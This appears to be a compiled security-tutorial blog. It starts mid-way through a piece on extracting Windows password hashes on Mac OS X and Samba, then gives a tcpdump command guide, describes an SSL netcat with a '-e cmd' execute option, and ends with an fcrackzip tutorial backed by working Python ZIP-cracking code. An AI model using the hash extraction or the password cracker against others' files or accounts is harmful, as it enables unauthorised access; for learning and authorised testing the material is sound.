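The "lm not stored" verdict is the state the Defense section is aiming for; the "<= 7 chars" verdict comes straight from the LM construction the notes above describe, where the second half of a short password hashes to the same constant as an empty one.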

Mac OS X 10.4

Mac OS X 10.4 (Tiger) improves the security by only storing LM+NTLM hashes for users who enable Windows Sharing for their account; and when they do enable it, it asks them to enter their password with a warning that their password is stored in a less secure format. However, for those users with Windows Sharing enabled, the above method will still work. The shadow file format is a little different, but the LM+NTLM hashes are still the first 64 characters. If the hashes are not stored, you will get all 0's when you try to retrieve the hashes.

Samba passwords

In older versions of Samba, the password hashes for Samba users were stored in the file /etc/smbpasswd (location may vary, only root has access) and are in similar format to Windows password hashes discussed above. In newer versions of Samba, run the following as root to get the same information:
pdbedit -L -w
If you want to see the whole tutorial and the full article about Cracking Windows XP Passwords, please go to the Source.
Source: http://en.wikibooks.org/wiki/Reverse_Engineering/Cracking_Windows_XP_Password

Summary of tcpdump commands.

Tcpdump is the premier network analysis tool for information security professionals.
When using a tool that displays network traffic a more natural (raw) way the burden of analysis is placed directly on the human rather than the application. This approach cultivates continued and elevated understanding of the TCP/IP suite, and for this reason I strongly advocate using tcpdump instead of other tools whenever possible.
15:31:34.079416 IP (tos 0x0, ttl  64, id 20244, offset 0, flags [DF], proto: 
TCP (6), length: 60) source.35970 > dest.80: S, cksum 0x0ac1 
(correct), 2647022145:2647022145(0) win 5840
0x0000:  4500 003c 4f14 4000 4006 7417 0afb 0257  E..
0x0010:  4815 222a 8c82 0050 9dc6 5a41 0000 0000  H."*...P..ZA....
0x0020:  a002 16d0 0ac1 0000 0204 05b4 0402 080a  ................
0x0030:  14b4 1555 0000 0000 0103 0302            ...U........


The first of these is -n, which requests that names are not resolved, resulting in the IPs themselves always being displayed.
The second is -X, which displays both hex and ascii content within the packet.
The final one is -S, which changes the display of sequence numbers to absolute rather than relative. The idea there is that you can't see weirdness in the sequence numbers if they're being hidden from you. Remember, the advantage of using tcpdump vs. another tool is getting manual interaction with the packets.
It's also important to note that tcpdump only takes the first 96 bytes of data from a packet by default. If you would like to look at more, add the -s number option to the mix, where number is the number of bytes you want to capture. I usually give it 1514 (to get everything) if I use this option. Here's a short list of the options I use most:
  • -i any : Listen on all interfaces just to see if you're seeing any traffic.
  • -n : Don't resolve hostnames.
  • -nn : Don't resolve hostnames or port names.
  • -X : Show the packet's contents in both hex and ASCII.
  • -XX : Same as -X, but also shows the ethernet header.
  • -v, -vv, -vvv : Increase the amount of packet information you get back.
  • -c : Only get x number of packets and then stop.
  • -S : Print absolute sequence numbers.
  • -e : Get the ethernet header as well.
  • -q : Show less protocol information.
  • -E : Decrypt IPSEC traffic by providing an encryption key.
  • -s : Set the snaplength, i.e. the amount of data that is being captured in bytes
  • -c : Only capture x number of packets, e.g. 'tcpdump -c 3'

Some Basic Uses

  1. Basic communication // see the basics without many options
    # tcpdump -nS
  2. Basic communication (very verbose) // see a good amount of traffic, with verbosity and no name help
    # tcpdump -nnvvS
  3. A deeper look at the traffic // adds -X for payload but doesn't grab any more of the packet
    # tcpdump -nnvvXS
  4. Heavy packet viewing // the final "s" increases the snaplength, grabbing the whole packet
    # tcpdump -nnvvXSs 1514
Here's a capture of exactly two (-c2) ICMP packets using some of the options described above. Notice how much we see about each packet.
hermes root # tcpdump -nnvXSs 1514 -c2 icmp
tcpdump: listening on eth0, link-type EN10MB (Ethernet), capture size 1514 
bytes 23:11:10.370321 IP (tos 0x20, ttl  48, id 34859, offset 0, flags 
[none], length: 84) > icmp 64: echo request seq 0

        0x0000:  4520 0054 882b 0000 3001 7cf5 45fe d52b  E..T.+..0.|.E..+
        0x0010:  4815 222a 0800 3530 272a 0000 25ff d744  H."*..50'*..%..D
        0x0020:  ae5e 0500 0809 0a0b 0c0d 0e0f 1011 1213  .^..............
        0x0030:  1415 1617 1819 1a1b 1c1d 1e1f 2021 2223  .............!"#
        0x0040:  2425 2627 2829 2a2b 2c2d 2e2f 3031 3233  $%&'()*+,-./0123
        0x0050:  3435 3637                                4567
23:11:10.370344 IP (tos 0x20, ttl  64, id 35612, offset 0, flags [none], 
length: 84) > icmp 64: echo reply seq 0
        0x0000:  4520 0054 8b1c 0000 4001 6a04 4815 222a  E..T....@.j.H."*
        0x0010:  45fe d52b 0000 3d30 272a 0000 25ff d744  E..+..=0'*..%..D
        0x0020:  ae5e 0500 0809 0a0b 0c0d 0e0f 1011 1213  .^..............
        0x0030:  1415 1617 1819 1a1b 1c1d 1e1f 2021 2223  .............!"#
        0x0040:  2425 2627 2829 2a2b 2c2d 2e2f 3031 3233  $%&'()*+,-./0123
        0x0050:  3435 3637                                4567
2 packets captured
2 packets received by filter
0 packets dropped by kernel
hermes root # 


Expressions allow you to trim out various types of traffic and find exactly what you're looking for. Mastering the expressions and learning to combine them creatively is what makes one truly powerful with tcpdump. An expression is built from three kinds of qualifier: type, dir, and proto.
Type qualifiers are host, net, and port. Direction is given by dir, where you can have src, dst, src or dst, and src and dst. Here are a few that you should definitely be comfortable with:

  • host // look for traffic based on IP address (a hostname also works; it is resolved when the filter is compiled, independently of -n, which only affects how addresses are printed)
    # tcpdump host
  • src, dst // find traffic from only a source or destination (eliminates one side of a host conversation)
    # tcpdump src
    # tcpdump dst
  • net // capture an entire network using CIDR notation
    # tcpdump net
  • proto // works for tcp, udp and icmp (and also ip, ip6, arp and others). Note that you don't have to type proto
    # tcpdump icmp
  • port // see only traffic to or from a certain port
    # tcpdump port 3389
  • src, dst port // filter based on the source or destination port
    # tcpdump src port 1025
    # tcpdump dst port 389
  • src/dst, port, protocol // combine all three
    # tcpdump src port 1025 and tcp
    # tcpdump udp and src port 53
You also have the option to filter by a range of ports instead of declaring them individually, and to only see packets that are above or below a certain size.
  • Port Ranges // see traffic to or from any port in a range
    tcpdump portrange 21-23
  • Packet Size Filter // only see packets below or above a certain size (in bytes). Note that "less N" means a length of N or less, and "greater N" means N or more
    tcpdump less 32
    tcpdump greater 128
  • [ You can also compare the length with the symbols <, >, <= and >=. The expression must then name "len" explicitly, and it has to be quoted, otherwise the shell treats < and > as redirections. ]
    // filtering for size using symbols
    tcpdump 'len > 32'
    tcpdump 'len <= 128'

Writing to a File

tcpdump allows you to send what you're capturing to a file for later use with the -w option, and then to read it back with the -r option. This is an excellent way to capture raw traffic and then run it through various tools later. Keep in mind that -w writes the packets exactly as captured, so set the snaplength (-s) large enough to keep whole packets, and that nothing is printed to the screen while writing.
The traffic captured in this way is stored in pcap (libpcap) format, which is pretty much universal in the network analysis space. This means it can be read by all sorts of tools, including Wireshark, Snort, etc.

Capture all Port 80 Traffic to a File

# tcpdump -s 1514 port 80 -w capture_file
Then, at some point in the future, you can then read the traffic back in like so:

Read Captured Traffic back into tcpdump

# tcpdump -r capture_file
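The hex dump shown earlier and the -w/-r round trip can be tied together in code. The following is an added example (Python; it is not from the original article): it takes the two ICMP packets exactly as tcpdump -X printed them on this page, decodes the IPv4 and ICMP headers to confirm the ttl, id, length and sequence values tcpdump reported, validates both checksums, and writes the packets into a classic pcap file that tcpdump -r or Wireshark will open. Because -X output starts at the IP header, the file uses link type 101 (LINKTYPE_RAW). The capture date is not on the page, so the record timestamps assume 1970-01-01 (an assumption), and the output file name is made up.

```python
import struct
from datetime import datetime

# Constructed input: the two packets copied from the tcpdump -X output above
# (hex columns only, ASCII column dropped).  -X output starts at the IP header.
ECHO_REQUEST_HEX = """
4520 0054 882b 0000 3001 7cf5 45fe d52b
4815 222a 0800 3530 272a 0000 25ff d744
ae5e 0500 0809 0a0b 0c0d 0e0f 1011 1213
1415 1617 1819 1a1b 1c1d 1e1f 2021 2223
2425 2627 2829 2a2b 2c2d 2e2f 3031 3233
3435 3637
"""
ECHO_REPLY_HEX = """
4520 0054 8b1c 0000 4001 6a04 4815 222a
45fe d52b 0000 3d30 272a 0000 25ff d744
ae5e 0500 0809 0a0b 0c0d 0e0f 1011 1213
1415 1617 1819 1a1b 1c1d 1e1f 2021 2223
2425 2627 2829 2a2b 2c2d 2e2f 3031 3233
3435 3637
"""
# Times as tcpdump printed them; the date is not on the page, so the pcap
# records assume 1970-01-01 (assumption made only to get valid timestamps).
TIMESTAMPS = ("23:11:10.370321", "23:11:10.370344")
LINKTYPE_RAW = 101  # pcap link type for "packet starts at the IP header"


def hexdump_to_bytes(dump):
    """Join the 16-bit hex groups of a tcpdump -X dump into raw bytes."""
    return bytes.fromhex("".join(dump.split()))


def ones_complement_sum(data):
    """RFC 1071 sum; a block whose checksum field is correct sums to 0xFFFF."""
    if len(data) % 2:
        data += b"\x00"
    total = sum(struct.unpack("!%dH" % (len(data) // 2), data))
    while total >> 16:
        total = (total & 0xFFFF) + (total >> 16)
    return total


def decode_ipv4_icmp(packet):
    """Parse the IPv4 header and the ICMP header behind it; returns the fields
    tcpdump -v prints (tos, ttl, id, offset, flags, length, ICMP type, seq)."""
    ver_ihl, tos, total_len, ident, flags_frag, ttl, proto, _csum, src, dst = \
        struct.unpack("!BBHHHBBH4s4s", packet[:20])
    ihl = (ver_ihl & 0x0F) * 4
    icmp = packet[ihl:total_len]
    icmp_type, icmp_code, _icsum, icmp_id, icmp_seq = struct.unpack("!BBHHH", icmp[:8])
    return {
        "version": ver_ihl >> 4, "tos": tos, "length": total_len, "id": ident,
        "flags": flags_frag >> 13, "offset": (flags_frag & 0x1FFF) * 8,
        "ttl": ttl, "proto": proto,
        "src": ".".join(map(str, src)), "dst": ".".join(map(str, dst)),
        "ip_checksum_ok": ones_complement_sum(packet[:ihl]) == 0xFFFF,
        "icmp_type": icmp_type, "icmp_code": icmp_code, "icmp_id": icmp_id,
        "icmp_seq": icmp_seq, "icmp_len": len(icmp),
        "icmp_checksum_ok": ones_complement_sum(icmp) == 0xFFFF,
    }


def timestamp_to_epoch(hhmmss_us):
    """tcpdump's HH:MM:SS.uuuuuu -> (seconds, microseconds) for a pcap record."""
    t = datetime.strptime(hhmmss_us, "%H:%M:%S.%f")
    return t.hour * 3600 + t.minute * 60 + t.second, t.microsecond


def build_pcap(packets, timestamps, snaplen=1514, linktype=LINKTYPE_RAW):
    """Serialise packets in classic libpcap format: a 24-byte global header
    (magic 0xa1b2c3d4, version 2.4), then a 16-byte record header per packet."""
    out = [struct.pack("<IHHiIII", 0xA1B2C3D4, 2, 4, 0, 0, snaplen, linktype)]
    for pkt, ts in zip(packets, timestamps):
        secs, usecs = timestamp_to_epoch(ts)
        out.append(struct.pack("<IIII", secs, usecs, len(pkt), len(pkt)) + pkt)
    return b"".join(out)


def read_pcap(blob):
    """Minimal reader for build_pcap output: returns (linktype, [packets])."""
    magic, _maj, _min, _tz, _sig, _snap, linktype = struct.unpack("<IHHiIII", blob[:24])
    if magic != 0xA1B2C3D4:
        raise ValueError("not a little-endian pcap file")
    pos, packets = 24, []
    while pos < len(blob):
        _s, _us, incl, _orig = struct.unpack("<IIII", blob[pos:pos + 16])
        packets.append(blob[pos + 16:pos + 16 + incl])
        pos += 16 + incl
    return linktype, packets


if __name__ == "__main__":
    pkts = [hexdump_to_bytes(ECHO_REQUEST_HEX), hexdump_to_bytes(ECHO_REPLY_HEX)]
    for p in pkts:
        print(decode_ipv4_icmp(p))
    with open("icmp_from_page.pcap", "wb") as fh:  # made-up output file name
        fh.write(build_pcap(pkts, TIMESTAMPS))
    # Then: tcpdump -nnvvXS -r icmp_from_page.pcap
```

The decoder recovers exactly what tcpdump printed for both packets (ttl 48 and 64, ids 34859 and 35612, length 84, echo request/reply with seq 0), and both IP and ICMP checksums verify, which is a cheap sanity check that a hex dump was transcribed correctly before you feed it to other tools.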

More Examples

# TCP traffic from destined for port 3389
tcpdump -nnvvS and src and dst port 3389

# Traffic originating from the 192.168 network headed for the 10 or 172.16 networks
tcpdump -nvX src net and dst net or

# Non-ICMP traffic destined for from the 172.16 network
tcpdump -nvvXSs 1514 dst and src net and not icmp

# Traffic originating from Mars or Pluto that isn't to the SSH port
tcpdump -vv src mars and not dst port 22

As you can see, you can build queries to find just about anything you need. The key is to first figure out precisely what you're looking for and then to build the syntax to isolate that specific type of traffic.


Also keep in mind that when you're building complex queries you might have to group your options using single quotes. Single quotes tell the shell to pass certain special characters through untouched, in this case the "( )" parentheses, which the shell would otherwise interpret itself before tcpdump ever sees them. The same technique can be used to group other expressions such as host, port, net, etc. Take a look at the commands below:
# Traffic that's from AND destined for ports 3389 or 22 (incorrect: the shell consumes the parentheses)
tcpdump src and (dst port 3389 or 22)
# Correct: quote the whole filter so tcpdump, not the shell, receives the parentheses
tcpdump 'src and (dst port 3389 or 22)'

If you want to see all examples and get full article, please see the Source.
Source: http://danielmiessler.com/study/tcpdump/

SSL Capable NetCat (and more)

You all know what netcat is (written by Hobbit in 1996), how to use it, and that it should have been integrated into all UNIX systems a long time ago. netcat lacked some features, and I tried to add them in this Perl version: for example, SSL support, TCP and UDP proxying, and IPv4/IPv6 proxying features. This is now done, unless I missed a bug. Now, enjoy.


SSL Capable NetCat 1.05

Usage: scnc [-options] host port

See `perldoc scnc' for full documentation

   -c                use SSL (default to not)
   -a ca.pem         use SSL certificate authority file
   -f cert.pem       use SSL certificate file (PEM format)
   -k cert-key.pem   use SSL private key file (PEM format)
   -6                use IPv6 (default to not)
   -t                do telnet negociation (default to not)
   -e cmd            command to execute
   -l                listen for connections (default to not)
   -p port           use local port number (default to random high)
   -s address        use address for bindings (default to all addresses)
   -u                use UDP socket (default to TCP)
   -v                be verbose (default to not)
   -z                test port for openness
   -w timeout        timeout before closing connection (default to infinite)
   -S program        use program as a send hook
   -R program        use program as a receive hook
   -r host:port           proxy connection to host:port
   -r host:port:ipv6      proxy connection to host:port using IPv6
   -r host:port::ssl      proxy connection to host:port using SSL
   -r host:port:ipv6:ssl  proxy connection to host:port using IPv6 and SSL


Example applications

Securing a connection with a SSL tunnel

You have a server and a client (of course) that you control. You have a service that does not support SSL, but you want to establish an SSL connection to avoid a peer being able to read your traffic. The solution is to create an SSL tunnel (as with ssltunnel or stunnel).

  • Server side (scnc will listen on port 10000/TCP using SSL and redirect traffic to localhost port 110/TCP):
prompt$ scnc -vc -a ca.pem -f server.pem -k server-key.pem -p 10000 -r localhost:110
server: SSL listening on: (IPv4)

  • Client side (scnc will listen on localhost port 1110/TCP and redirect traffic to server port 10000/TCP using SSL):
prompt$ scnc -v -s localhost -p 1110 -r server:10000::ssl
server: listening on: (IPv4)
Now, you can use your client side application and use localhost and port 1110/TCP as the server address. All traffic will use SSL to secure your connection.

Test SSL certificates

If you want to test SSL features, you can use the following certificates. WARNING: they have been generated using the ugly Debian "patched" OpenSSL library :)

If you want to see all examples, please go to the Source.
Source: http://gomor.org/bin/view/GomorOrg/SslNetcat

Howto: Crack Password-Protected ZIP Files

This tutorial is for Ubuntu or BackTrack users who want to crack password-protected ZIP files with a wordlist or by brute force.

1. Install the fcrackzip package.
   -  apt-get install fcrackzip
2. Crack the archive with a dictionary or brute-force attack.
   - Brute-force attack (the tutorial runs fcrackzip without a mode switch; -b selects brute force explicitly, -c chooses the character set and -l the length range).
  •      fcrackzip -v zipfiles
   - Dictionary attack (-D reads candidate passwords from the file named with -p).
  •      fcrackzip -v -D -p /pentest/passwords/wordlists/wordlists zipfiles
      *** The wordlist is a file containing candidate passwords, one per line.
      *** My wordlist is /pentest/passwords/wordlists/wordlists
      *** Traditional ZIP encryption exposes only a single check byte per file, so fcrackzip can report false "possible pw found" hits. Add -u so that each candidate is confirmed by actually unzipping the first file with it.
3. That's it; the file is cracked.
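To make clear what fcrackzip is actually testing, here is an added worked example in Python (it is not fcrackzip's code and not part of the tutorial). It implements the traditional PKWARE "ZipCrypto" cipher that classic password-protected ZIPs use, builds a small encrypted archive in memory so the script runs offline, and then cracks it the way fcrackzip does: a cheap one-byte header check per candidate, followed by a full decrypt-and-CRC verification of any candidate that passes, which is what fcrackzip's -u option adds. The password, the file name and content, and the wordlist are constructed for the demo and stand in for the tutorial's /pentest/passwords/wordlists/wordlists; they are assumptions, not values from the page.

```python
import io
import itertools
import struct
import zipfile
import zlib

# Constructed demo inputs (assumptions, not from the tutorial): the password,
# the file inside the archive, and a stand-in for the tutorial's wordlist file.
SECRET = b"dragon"
PLAINTEXT = b"top secret\n"
WORDLIST = ["123456", "password", "letmein", "qwerty", "dragon", "monkey"]


def _crc32_byte(crc, b):
    # One table step of CRC-32 without zlib's pre/post inversion: the update
    # that APPNOTE section 6.1 specifies for the ZipCrypto key schedule.
    return zlib.crc32(bytes([b]), crc ^ 0xFFFFFFFF) ^ 0xFFFFFFFF


class ZipCrypto:
    """Traditional PKWARE cipher: three 32-bit keys seeded from the password and
    advanced by every plaintext byte, so a wrong password desynchronises at once."""

    def __init__(self, password):
        self.k = [0x12345678, 0x23456789, 0x34567890]
        for b in password:
            self._update(b)

    def _update(self, b):
        k0 = _crc32_byte(self.k[0], b)
        k1 = ((self.k[1] + (k0 & 0xFF)) * 134775813 + 1) & 0xFFFFFFFF
        self.k = [k0, k1, _crc32_byte(self.k[2], k1 >> 24)]

    def _stream_byte(self):
        t = (self.k[2] | 2) & 0xFFFF
        return ((t * (t ^ 1)) >> 8) & 0xFF

    def encrypt(self, data):
        out = bytearray()
        for p in data:
            out.append(p ^ self._stream_byte())
            self._update(p)  # keys advance on the plaintext byte
        return bytes(out)

    def decrypt(self, data):
        out = bytearray()
        for c in data:
            p = c ^ self._stream_byte()
            self._update(p)
            out.append(p)
        return bytes(out)


def make_encrypted_zip(name, data, password):
    """Hand-build a one-entry stored (method 0) ZipCrypto archive: the standard
    library can read but not write encrypted ZIPs."""
    crc = zlib.crc32(data) & 0xFFFFFFFF
    # 12-byte encryption header: 11 filler bytes (real archivers use random ones),
    # then the CRC's high byte, the only value a decryptor can cheaply check.
    body = ZipCrypto(password).encrypt(bytes(11) + bytes([crc >> 24]) + data)
    fname, flags, stored, t, d = name.encode(), 0x0001, 0, 0, 0x21  # flag bit 0 = encrypted
    local = struct.pack("<IHHHHHIIIHH", 0x04034B50, 20, flags, stored, t, d,
                        crc, len(body), len(data), len(fname), 0) + fname
    central = struct.pack("<IHHHHHHIIIHHHHHII", 0x02014B50, 20, 20, flags, stored, t, d,
                          crc, len(body), len(data), len(fname), 0, 0, 0, 0, 0, 0) + fname
    eocd = struct.pack("<IHHHHIIH", 0x06054B50, 0, 0, 1, 1, len(central), len(local) + len(body), 0)
    return local + body + central + eocd


def quick_check(zip_bytes, candidate):
    """fcrackzip's cheap test: decrypt only the 12-byte header of the first entry
    (at offset 0 in archives from make_encrypted_zip) and compare its last byte
    with the CRC's high byte.  A wrong password still passes about 1 time in 256."""
    hdr = struct.unpack("<IHHHHHIIIHH", zip_bytes[:30])
    crc, start = hdr[6], 30 + hdr[9] + hdr[10]
    return ZipCrypto(candidate).decrypt(zip_bytes[start:start + 12])[11] == crc >> 24


def verify(zip_bytes, name, candidate):
    """Full test (what fcrackzip -u adds): decrypt the whole entry and check its CRC."""
    with zipfile.ZipFile(io.BytesIO(zip_bytes)) as zf:
        try:
            return zf.read(name, pwd=candidate)
        except (RuntimeError, zipfile.BadZipFile):  # bad password / bad CRC-32
            return None


def dictionary_attack(zip_bytes, name, wordlist):
    """fcrackzip -D -p style: one candidate per line, quick check first.
    Returns (password, plaintext, number of quick-check false positives seen)."""
    false_positives = 0
    for word in wordlist:
        cand = word.strip().encode()
        if cand and quick_check(zip_bytes, cand):
            data = verify(zip_bytes, name, cand)
            if data is not None:
                return cand, data, false_positives
            false_positives += 1
    return None, None, false_positives


def brute_force(zip_bytes, name, charset, max_len):
    """fcrackzip brute-force style: every string over charset up to max_len."""
    for n in range(1, max_len + 1):
        for combo in itertools.product(charset, repeat=n):
            cand = "".join(combo).encode()
            if quick_check(zip_bytes, cand) and verify(zip_bytes, name, cand) is not None:
                return cand
    return None


ARCHIVE = make_encrypted_zip("notes.txt", PLAINTEXT, SECRET)

if __name__ == "__main__":
    print(dictionary_attack(ARCHIVE, "notes.txt", WORDLIST))
    print(brute_force(make_encrypted_zip("a.txt", b"hi", b"ab"), "a.txt", "ab", 2))
```

The two-stage check is the point: the header byte is all a cracker can test at roughly one CRC step per candidate, which is why fcrackzip is fast, and it is also why it prints "possible pw found" rather than a definite answer. Confirming a hit by decrypting the whole entry (here via zipfile, in fcrackzip via -u) is cheap because it only happens for the few candidates that pass the first stage.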

I first saw fcrackzip's example at the Source, tried it myself and then wrote this tutorial.
Source: http://networkedblogs.com/fTzLu#